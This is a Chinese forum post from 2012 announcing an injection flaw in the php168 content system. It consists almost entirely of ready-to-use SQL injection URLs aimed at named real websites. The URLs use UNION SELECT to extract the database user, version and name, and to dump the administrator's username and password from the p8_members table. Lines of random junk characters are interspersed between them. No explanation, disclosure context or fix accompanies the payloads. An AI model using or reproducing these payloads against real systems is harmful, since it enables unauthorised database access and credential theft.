找回密码
 立即注册
查看: 3442|回复: 0
打印 上一主题 下一主题

php168某系统注入漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2012-10-18 08:52:44 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
http://v7.php168.com/zhidao/user.php?j=question&u=-1+union+select+1,2,3,concat(user(),0x3a,version(),0x3a,database()),5,6,7,8--
8 D$ k+ M" \0 g, m6 ?' I6 g                                                         
, j7 k' B8 f: n5 l                                       
7 p3 W6 G, f. M# I" c: J9 J/ \
$ }, |6 [  U3 z. r1 A
http://www.china-highway.com/zhidao/user.php?%00&j=question&u=-1+union+select+1,2,3,concat(0x3a,username,0x3a,password),5,6,7,8+from+p8_members+where+uid=1--- x" x& ^) _+ n1 C5 a8 u
                                                     
3 c  F1 v# h, c* X% E& t; b; x                                                                   ! `* S5 G- n" m4 b  p' k
                                                        2 X- Y, t+ H1 {; s
http://v7.php168.com/zhidao/user ... u=-1+union+select+1,2,3,concat(user(),0x3a,version(),0x3a,database()),5,6,7,8--
% m8 g. f4 o# F
6 l- n4 K9 U. [. {4 F
3 D% h( y/ R, H- M2 V7 u, R
) c. X5 Y! M) ]7 f$ ?7 e0 n" L# p                                                            
& `, h+ Q* u9 ~3 {4 M' N4 `
/ l, {( W4 l/ q0 s; ^" v: Xhttp://www.china-highway.com/zhi ... u=-1+union+select+1,2,3,concat(0x3a,username,0x3a,password),5,6,7,8+from+p8_members+where+uid=1--
* q7 ~6 l! i8 |6 D$ f
; z! k0 m$ w, M/ k0 ~$ x/ L8 b" X
7 c1 I, X" t. X1 |8 O5 w! X
* P3 q5 N  E- ]1 c- k3 I                                                                    
$ |% m* k* k! }% ^6 V

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表